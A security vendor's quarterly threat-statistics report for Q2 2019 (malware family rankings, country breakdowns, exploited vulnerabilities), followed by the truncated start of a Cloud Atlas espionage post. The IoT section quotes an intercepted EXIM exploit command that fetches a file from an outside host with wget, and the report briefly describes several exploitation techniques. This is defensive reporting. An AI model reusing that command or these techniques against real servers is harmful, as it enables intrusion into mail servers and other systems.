!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile banking threats, Q2 2019 (download)

Top 10 countries by share of users attacked by mobile banking Trojans: Country* %** 1 South Africa 0.64% 2 Russia 0.31% 3 Tajikistan 0.21% 4 Australia 0.17% 5 Turkey 0.17% 6 Ukraine 0.13% 7 Uzbekistan 0.11% 8 Korea 0.11% 9 Armenia 0.10% 10 India 0.10%

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000).
** Unique users attacked by mobile banking Trojans as a percentage of all users of Kaspersky mobile solutions in the country.

In Q2 2019, South Africa (0.64%) climbed to first place, up from fourth in the previous quarter. In 97% of cases, users in that country encountered Trojan-Banker.AndroidOS.Agent.dx.

Second place was claimed by Russia (0.31%), where our solutions most often detected members of the Asacub and Svpeng families: Trojan-Banker.AndroidOS.Asacub.a (14.03%), Trojan-Banker.AndroidOS.Asacub.snt (13.96%), and Trojan-Banker.AndroidOS.Svpeng.ak (13.95%).

Third place belongs to Tajikistan (0.21%), where Trojan-Banker.AndroidOS.Faketoken.z (35.96%), Trojan-Banker.AndroidOS.Asacub.a (12.92%), and Trojan- Banker.AndroidOS.Grapereh.j (11.80%) were most frequently met.

Mobile ransomware Trojans

In Q2 2019, we detected 23,294 installation packages for mobile Trojan ransomware, which is 4,634 fewer than last quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of installation packages for mobile banking Trojans, Q3 2018 – Q2 2019 (download)

Top 10 mobile ransomware Trojans Verdict %* 1 Trojan-Ransom.AndroidOS.Svpeng.aj 43.90 2 Trojan-Ransom.AndroidOS.Rkor.i 11.26 3 Trojan-Ransom.AndroidOS.Rkor.h 7.81 4 Trojan-Ransom.AndroidOS.Small.as 6.41 5 Trojan-Ransom.AndroidOS.Svpeng.ah 5.92 6 Trojan-Ransom.AndroidOS.Svpeng.ai 3.35 7 Trojan-Ransom.AndroidOS.Fusob.h 2.48 8 Trojan-Ransom.AndroidOS.Small.o 2.46 9 Trojan-Ransom.AndroidOS.Pigetrl.a 2.45 10 Trojan-Ransom.AndroidOS.Small.ce 2.22

* Unique users attacked by this malware as a percentage of all users of Kaspersky mobile solutions that were attacked by ransomware Trojans.

In Q2 2019, the most widespread family of ransomware Trojans was Svpeng: three positions in the Top 10.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of mobile ransomware Trojans, Q2 2019 (download)

Top 10 countries by share of users attacked by mobile ransomware Trojans: Country* %** 1 US 1.58 2 Kazakhstan 0.39 3 Iran 0.27 4 Pakistan 0.16 5 Saudi Arabia 0.10 6 Mexico 0.09 7 Canada 0.07 8 Italy 0.07 9 Singapore 0.05 10 Indonesia 0.05

* Excluded from the rating are countries with relatively few users of Kaspersky mobile solutions (under 10,000)
** Unique users attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky mobile solutions in the country.

The leaders by number of users attacked by mobile ransomware Trojans, as in the previous quarter, were the US (1.58%), Kazakhstan (0.39%), and Iran (0.27%)

Attacks on Apple macOS

Q2 witnessed several interesting events, three of which deserve special attention.

A vulnerability was discovered in the macOS operating system allowing Gatekeeper and XProtect scans to be bypassed. Exploitation requires creating an archive with a symbolic link to the shared NFS folder containing the file. When the archive is opened, the file from the shared NFS folder is automatically downloaded by the system without any checks. The first malware exploiting this vulnerability was not long in coming; however, all the detected specimens were more likely test versions than actual malware.

Vulnerabilities detected in the Firefox browser (CVE-2019-11707, CVE-2019-11708) allowed arbitrary code to be executed with a view to sandbox escape. After this information was made public, the first exploitations occurred. Using these vulnerabilities, cybercriminals dropped spyware Trojans from the Mokes and Wirenet families onto victim computers.

Also an interesting vector for delivering a malicious miner to victims was discovered. The attackers used social engineering and legitimate apps modified with malicious code. But even more interestingly, the malicious part consisted of a QEMU emulator and a Linux virtual machine, housing the miner. As soon as QEMU was launched on the infected machine, the miner started up inside its image. The scheme is so outlandish – both QEMU and the miner consume significant resources – that such a Trojan could not remain unnoticed for long.

Top 20 threats for macOS Verdict %* 1 Trojan-Downloader.OSX.Shlayer.a 24.61 2 AdWare.OSX.Spc.a 12.75 3 AdWare.OSX.Bnodlero.t 11.98 4 AdWare.OSX.Pirrit.j 11.27 5 AdWare.OSX.Pirrit.p 8.42 6 AdWare.OSX.Pirrit.s 7.76 7 AdWare.OSX.Pirrit.o 7.59 8 AdWare.OSX.MacSearch.a 5.92 9 AdWare.OSX.Cimpli.d 5.76 10 AdWare.OSX.Mcp.a 5.39 11 AdWare.OSX.Agent.b 5.11 12 AdWare.OSX.Pirrit.q 4.31 13 AdWare.OSX.Bnodlero.v 4.02 14 AdWare.OSX.Bnodlero.q 3.70 15 AdWare.OSX.MacSearch.d 3.66 16 Downloader.OSX.InstallCore.ab 3.58 17 AdWare.OSX.Geonei.as 3.48 18 AdWare.OSX.Amc.a 3.29 19 AdWare.OSX.Agent.c 2.93 20 AdWare.OSX.Mhp.a 2.90

* Unique users attacked by this malware as a percentage of all users of Kaspersky security solutions for macOS that were attacked.

On the topic of most common threats in Q2, the Shlayer.a Trojan (24.61%) retained top spot. In second place is the adware app AdWare.OSX.Spc.a (12.75%) and in third AdWare.OSX.Bnodlero.t (11.98%), which pushed AdWare.OSX.Pirrit.j (11.27%) into fourth. Like last quarter, most of the Top 20 places went to adware apps. Among them, members of the Pirrit family were particularly prominent: five positions out of 20.

Threat geography Country* %** 1 France 11.11 2 Spain 9.68 3 India 8.84 4 US 8.49 5 Canada 8.35 6 Russia 8.01 7 Italy 7.74 8 UK 7.47 9 Mexico 7.08 10 Brazil 6.85

* Excluded from the rating are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000)
** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country.

In terms of the geographical spread of macOS threats, France (11.11%), Spain (9.68%), and India (8.84%) retained their leadership.

In the US (8.49%), Canada (8.35%), and Russia (8.01%), the share of infected users increased, ranking these countries respectively fourth, fifth, and sixth in our Top 10.

IoT attacks Interesting events

In the world of Linux/Unix threats, the most significant event was the active rise in the number of attacks exploiting a new vulnerability in the EXIM mail transfer agent. In a nutshell, the attacker creates a special email and fills the recipient field with code to be executed on the vulnerable target mail server. The message is then sent using this server. EXIM processes the sent message and executes the code in the recipient field.

Intercepted attack traffic

The screenshot shows a message whose RCPT field contains the shell script. The latter actually looks as follows:

/bin/bash -c "wget X.X.X.X/exm -O /dev/null IoT threat statistics

Q2 2019 demonstrated a significant drop in attacks via telnet: around 60% versus 80% in Q1. The assumption is that cybercriminals are gradually switching to more productive hardware enabling the use of SSH.

SSH 40.43% Telnet 59.57%

Distribution of attacked services by number of unique IP addresses of attacking devices, Q2 2019

However, in terms of number of sessions involving Kaspersky Lab honeypots, we see a decline for SSH from 64% in Q1 to 49.6% in Q2.

SSH 49.59% Telnet 50.41%

Distribution of cybercriminals’ working sessions with Kaspersky Lab traps, Q2 2019

Telnet-based attacks

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab telnet traps, Q2 2019 (download)

Top 10 countries by location of devices from which telnet-based attacks were carried out on Kaspersky Lab traps Country % 1 Egypt 15.06 2 China 12.27 3 Brazil 10.24 4 US 5.23 5 Russia 5.03 6 Greece 4.54 7 Iran 4.06 8 Taiwan 3.15 9 India 3.04 10 Turkey 2.90

For the second quarter in a row, Egypt (15.06%) topped the leaderboard by number of unique IP addresses from which attempts were made to attack Kaspersky Lab traps. Second place, by a small margin, went to China (12.27%), with Brazil (10.24%) in third.

Telnet-based attacks most often used a member of the infamous Mirai malware family as ammunition.

Top 10 malware downloaded to infected IoT devices via successful telnet-based attacks Verdict %* 1 Backdoor.Linux.Mirai.b 38.92 2 Trojan-Downloader.Linux.NyaDrop.b 26.48 3 Backdoor.Linux.Mirai.ba 26.48 4 Backdoor.Linux.Mirai.au 15.75 5 Backdoor.Linux.Gafgyt.bj 2.70 6 Backdoor.Linux.Mirai.ad 2.57 7 Backdoor.Linux.Gafgyt.az 2.45 8 Backdoor.Linux.Mirai.h 1.38 9 Backdoor.Linux.Mirai.c 1.36 10 Backdoor.Linux.Gafgyt.av 1.26

* Share of malware type in the total amount of malware downloaded to IoT devices via successful telnet attacks

As things stand, there is no reason to expect a change in the situation with Mirai, which remains the most popular malware family with cybercriminals attacking IoT devices.

SSH-based attacks

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of IP addresses of devices from which attempts were made to attack Kaspersky Lab SSH traps, Q2 2019 (download)

Top 10 countries by location of devices from which attacks were made on Kaspersky Lab SSH traps Country % 1 Vietnam 15.85 2 China 14.51 3 Egypt 12.17 4 Brazil 6.91 5 Russia 6.66 6 US 5.05 7 Thailand 3.76 8 Azerbaijan 3.62 9 India 2.43 10 France 2.12

In Q2 2019, the Top 3 countries by number of devices attacking Kaspersky Lab traps using the SSH protocol were Vietnam (15.85%), China (14.51%), and Egypt (12.17%). The US (5.05%), which took second place in Q1 2019, dropped down to seventh.

Financial threats Financial threat statistics

In Q2 2019, Kaspersky solutions blocked attempts to launch one or more types of malware designed to steal money from bank accounts on the computers of 228,206 users.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by financial malware, Q2 2019 (download)

Attack geography

To evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, for each country we calculated the share of users of Kaspersky products that faced this threat during the reporting period out of all users of our products in that country.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of banking malware attacks, Q2 2019 (download)

Top 10 countries by share of attacked users Country* %** 1 Belarus 2.0 2 Venezuela 1.8 3 China 1.6 4 Indonesia 1.3 5 South Korea 1.3 6 Cyprus 1.2 7 Paraguay 1.2 8 Russia 1.2 9 Cameroon 1.1 10 Serbia 1.1

* Excluded are countries with relatively few Kaspersky product users (under 10,000).
** Unique users whose computers were targeted by banking Trojans as a percentage of all unique users of Kaspersky products in the country.

Top 10 banking malware families Name Verdicts %* 1 RTM Trojan-Banker.Win32.RTM 32.2 2 Zbot Trojan.Win32.Zbot 23.3 3 Emotet Backdoor.Win32.Emotet 8.2 4 Nimnul Virus.Win32.Nimnul 6.4 5 Trickster Trojan.Win32.Trickster 5.0 6 Nymaim Trojan.Win32.Nymaim 3.5 7 SpyEye Backdoor.Win32.SpyEye 3.2 8 Neurevt Trojan.Win32.Neurevt 2.8 9 IcedID Trojan-Banker.Win32.IcedID 1.2 10 Gozi Trojan.Win32.Gozi 1.1

** Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q2 2019, the Top 3 remained unchanged compared to the previous quarter. The leading positions in our Top 10, by a clear margin, went to the Trojan-Banker.Win32.RTM (32.2%) and Trojan.Win32.Zbot (23.3%) families. Their shares rose by 4.8 and 0.4 p.p. respectively. Behind them came the Backdoor.Win32.Emotet family (8.2%); its share, conversely, fell by 1.1 p.p. From the beginning of June, we noted a decrease in the activity of Emotet C&C servers, and by early Q3 almost all the C&C botnets were unavailable.

We also observe that in Q2 Trojan-Banker.Win32.IcedID (1.2%) and Trojan.Win32.Gozi (1.1%) appeared in the Top 10 families. They took ninth and tenth places, respectively.

Ransomware programs Quarterly highlights

After almost 18 months of active distribution, the team behind the GandCrab ransomware announced it was shutting down the operation. According to our reports, it was one of the most common ransomware encryptors.

In Q2, distribution got underway of the new Sodin ransomware (aka Sodinokibi or REvil), which was noteworthy for several reasons. There was the distribution method through hacking vulnerable servers, plus the use of a rare LPE exploit, not to mention the complex cryptographic scheme.

Also this quarter, there were a few high-profile ransomware infections in the computer networks of city administrations. This is not a new trend, since hacking corporate or municipal networks for extortion purposes is common enough. However, the mass nature of such incidents in recent years draws attention to the security of critical computer infrastructure, on which not only individual organizations but entire communities rely.

Number of new modifications

In Q2 2019, we identified eight new families of ransomware Trojans and detected 16,017 new modifications of these malware types. For comparison, Q1 saw 5,222 new modifications, three times fewer.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of new ransomware modifications, Q2 2018 – Q2 2019 (download)

The majority of new modifications belonged to the Trojan-Ransom.Win32.Gen family (various Trojans are automatically detected as such based on behavioral rules), as well as Trojan-Ransom.Win32.PolyRansom. The large number of PolyRansom modifications was due to the nature of this malware – it is a worm that creates numerous mutations of its own body. It substitutes these modified copies for user files, and places the victim’s data inside them in encrypted form.

Number of users attacked by ransomware Trojans

In Q2 2019, Kaspersky products defeated ransomware attacks against 232,292 unique KSN users. This is 50,000+ fewer than the previous quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by ransomware Trojans, Q2 2019 (download)

The busiest month for protecting attacked users was April (107,653); this is even higher than the figure for March (106,519), which marks a continuation of the upward trend seen in Q1. However, in May the number of attacked users began to fall, and in June they amounted to a little over 82,000.

Attack geography

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geographical spread of countries by share of users attacked by ransomware Trojans, Q2 2019 (download)

Top 10 countries attacked by ransomware Trojans Country* % of users attacked by ransomware** 1 Bangladesh 8.81% 2 Uzbekistan 5.52% 3 Mozambique 4.15% 4 Ethiopia 2.42% 5 Nepal 2.26% 6 Afghanistan 1.50% 7 China 1.18% 8 Ghana 1.17% 9 Korea 1.07% 10 Kazakhstan 1.06%

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by Trojan encryptors as a percentage of all unique users of Kaspersky products in the country.

Top 10 most common families of ransomware Trojans Name Verdict* Percentage of attacked users** 1 WannaCry Trojan-Ransom.Win32.Wanna 23.37% 2 (generic verdict) Trojan-Ransom.Win32.Phny 18.73% 3 GandCrab Trojan-Ransom.Win32.GandCrypt 13.83% 4 (generic verdict) Trojan-Ransom.Win32.Gen 7.41% 5 (generic verdict) Trojan-Ransom.Win32.Crypmod 4.73% 6 (generic verdict) Trojan-Ransom.Win32.Encoder 4.15% 7 Shade Trojan-Ransom.Win32.Shade 2.75% 8 PolyRansom/VirLock Virus.Win32.PolyRansom
Trojan-Ransom.Win32.PolyRansom 2.45% 9 Crysis/Dharma Trojan-Ransom.Win32.Crusis 1.31% 10 Cryakl Trojan-Ransom.Win32.Cryakl 1.24%

* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to provide statistical data.
** Unique Kaspersky users attacked by a particular family of ransomware Trojans as a percentage of all users attacked by ransomware Trojans.

Miners Number of new modifications

In Q2 2019, Kaspersky solutions detected 7,156 new modifications of miners, almost 5,000 fewer than in Q1.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of new miner modifications, Q2 2019 (download)

The largest number of new modifications was detected in April (3,101). This is also nearly 1,000 more than in March 2019, but, on average, new miner modifications are appearing less and less.

Number of users attacked by miners

In Q2, we detected attacks using miners on the computers of 749,766 unique users of Kaspersky products worldwide.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Number of unique users attacked by miners, Q2 2019 (download)

Throughout the quarter, the number of attacked users gradually decreased – from 383,000 in April to 318,000 in June.

Attack geography

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geographical spread of countries by share of users attacked by miners, Q2 2019 (download)

Top 10 countries by share of users attacked by miners

Country* % of users attacked by miners** 1 Afghanistan 10.77% 2 Ethiopia 8.99% 3 Uzbekistan 6.83% 4 Kazakhstan 4.76% 5 Tanzania 4.66% 6 Vietnam 4.28% 7 Mozambique 3.97% 8 Ukraine 3.08% 9 Belarus 3.06% 10 Mongolia 3.06%

* Excluded are countries with relatively few Kaspersky users (under 50,000).
** Unique users whose computers were attacked by miners as a percentage of all unique users of Kaspersky products in the country.

Vulnerable applications used by cybercriminals during cyber attacks

Over the past year, the Microsoft Office suite has topped our breakdown of the most attacked applications. Q2 2019 was no exception – the share of exploits for vulnerabilities in Microsoft Office applications rose from 67% to 72%. The reason for the growth was primarily the incessant mass spam mailings distributing documents with exploits for the CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802 vulnerabilities. These vulnerabilities exploit stack overflow due to bugs in object processing to remotely execute code for the Equation Editor component in Microsoft Office. Other Office vulnerabilities such as CVE-2017-8570 and CVE-2017-8759 are also popular with cybercriminals.

The increasing popularity of exploits for Microsoft Office suggests that cybercriminals see it as the easiest and fastest way to deploy malware on victim computers. In other words, these exploits are more likely to succeed, since their format enables the use of various techniques for bypassing static detection tools, and their execution is hidden from users and requires no additional actions, such as running macros.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of exploits used by cybercriminals, by type of attacked application, Q2 2019 (download)

The share of detected exploits for vulnerabilities in different web browsers in Q2 amounted to 14%, five times less than the share of exploits for Microsoft Office. Most browser vulnerabilities are the result of errors in just-in-time code compilation, as well as during various stages of code optimization, since the logic of these processes is complex and demands special attention from developers. Insufficient checks for potential modification of data or data types during such processing, when it is not expected by the compiler/optimizer, often give rise to new vulnerabilities. Other common errors that can lead to remote code execution in web browsers are data type overflow, freed memory usage, and incorrect use of types. Perhaps the most interesting example this quarter was a zero-day exploit targeted at employees of Coinbase and a number of other organizations. Found in the wild, it utilized two vulnerabilities at once, CVE-2019-11707 and CVE-2019-11708, for remote code execution in Mozilla Firefox.

On the topic of zero-days, the release in Q2 of exploit code by a security researcher under the pseudonym SandboxEscaper is worth noting. The set of exploits, named PolarBear, elevates privileges under Windows 10 and targets the following vulnerabilities: CVE-2019-1069, CVE-2019-0863, CVE-2019-0841, and CVE-2019-0973.

The share of network attacks continued to grow in Q2. Cybercriminals did not abandon EternalBlue-based attacks on systems with an unpatched SMB subsystem, and were active in bringing new vulnerabilities on stream in network applications such as Oracle WebLogic. A separate note goes to the ongoing password attacks on Remote Desktop Protocol and Microsoft SQL Server. However, the greatest danger for many users came from the CVE-2019-0708 vulnerability, found in Q2, in the remote desktop subsystem for Windows XP, Windows 7, and Windows Server 2008. It can be used by cybercriminals to gain remote control over vulnerable computers, and create a network worm not unlike the WannaCry ransomware. Insufficient scanning of incoming packets allows an attacker to implement a use-after-free script and overwrite data in the kernel memory. Note that exploitation of this attack does not require access to a remote account, as it takes place at the authorization stage before the username and password are checked.

Attacks via web resources

The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Countries that are sources of web-based attacks: Top 10

The following statistics show the distribution by country of the sources of Internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites containing exploits and other malicious programs, botnet C&C centers, etc.). Any unique host could be the source of one or more web-based attacks.

To determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In Q2 2019, Kaspersky solutions defeated 717,057,912 attacks launched from online resources located in 203 countries across the globe. 217,843,293 unique URLs triggered Web Anti-Virus components.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of web-based attack sources by country, Q2 2019 (download)

This quarter, Web Anti-Virus was most active on resources located in the US. Overall, the Top 4 remained unchanged from the previous quarter.

Countries where users faced the greatest risk of online infection

To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious objects that fall under the Malware class; it does not include Web Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Algeria 20.38 2 Venezuela 19.13 3 Albania 18.30 4 Greece 17.36 5 Moldova 17.30 6 Bangladesh 16.82 7 Estonia 16.68 8 Azerbaijan 16.59 9 Belarus 16.46 10 Ukraine 16.18 11 France 15.84 12 Philippines 15.46 13 Armenia 15.40 14 Tunisia 15.29 15 Bulgaria 14.73 16 Poland 14.69 17 Réunion 14.68 18 Latvia 14.65 19 Peru 14.50 20 Qatar 14.32

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky products in the country.

These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky products who consented to provide statistical data.

On average, 12.12% of Internet user computers worldwide experienced at least one Malware-class attack during the quarter.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of malicious web-based attacks, Q2 2019 (download)

Local threats

Statistics on local infections of user computers are an important indicator. They include objects that penetrated the target computer through infecting files or removable media, or initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q2 2019, our File Anti-Virus detected 240,754,063 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection

For each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

Note that as of this quarter, the rating includes only Malware-class attacks; it does not include File Anti-Virus triggers in response to potentially dangerous or unwanted programs, such as RiskTool or adware.

Country* % of attacked users** 1 Afghanistan 55.43 2 Tajikistan 55.27 3 Uzbekistan 55.03 4 Yemen 52.12 5 Turkmenistan 50.75 6 Laos 46.12 7 Syria 46.00 8 Myanmar 45.61 9 Mongolia 45.59 10 Ethiopia 44.95 11 Bangladesh 44.11 12 Iraq 43.79 13 China 43.60 14 Bolivia 43.47 15 Vietnam 43.22 16 Venezuela 42.71 17 Algeria 42.33 18 Cuba 42.31 19 Mozambique 42.14 20 Rwanda 42.02

These statistics are based on detection verdicts returned by the OAS and ODS Anti-Virus modules received from users of Kaspersky products who consented to provide statistical data. The data includes detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera memory cards, phones, or external hard drives.

* Excluded are countries with relatively few Kaspersky users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Geography of local threats, Q2 2019 (download)

Overall, 22.35% of user computers globally faced at least one Malware-class local threat during Q2.

The figure for Russia was 26.14%.

2019. augusztus 12.

Recent Cloud Atlas activity

Also known as Inception, Cloud Atlas is an actor that has a long history of cyber-espionage operations targeting industries and governmental entities. We first reported Cloud Atlas in 2014 and we’ve been following its activities ever since.

From the beginning of 2019 until July, we have been able to identify different spear-phishing campaigns related to this threat actor mostly focused on Russia, Central Asia and independent regions of Ukraine.

Countries targeted by Cloud Atlas recently

Cloud Atlas hasn’t changed its TTPs (Tactic Tools and Procedures) since 2018 and is still relying on its effective existing tactics and malware in order to compromise high value targets.

The Windows branch of the Cloud Atlas intrusion set still uses spear-phishing emails to target high profile victims. These emails are crafted with Office documents that use malicious remote templates – whitelisted per victims – hosted on remote servers. We described one of the techniques used by Cloud Atlas in 2017 and our colleagues at Palo Alto Networks also wrote about it in November 2018.

Previously, Cloud Atlas dropped its “validator” implant named “PowerShower” directly, after exploiting the Microsoft Equation vulnerability (CVE-2017-11882) mixed with CVE-2018-0802. During recent months, we have seen a new infection chain, involving a polymorphic HTA, a new and polymorphic VBS implant aimed at executing PowerShower, and the Cloud Atlas second stage modular backdoor that we disclosed five years ago in our first blogpost about them and which remains unchanged.

Let’s meet PowerShower

PowerShower, named and previously disclosed by Palo Alto Networks in their blogspot (see above), is a malicious piece of PowerShell designed to receive PowerShell and VBS modules to execute on the local computer. This malware has been used since October 2018 by Cloud Atlas as a validator and now as a second stage. The differences in the two versions reside mostly in anti-forensics features for the validator version of PowerShower.

The PowerShower backdoor – even in its later developments – takes three commands:

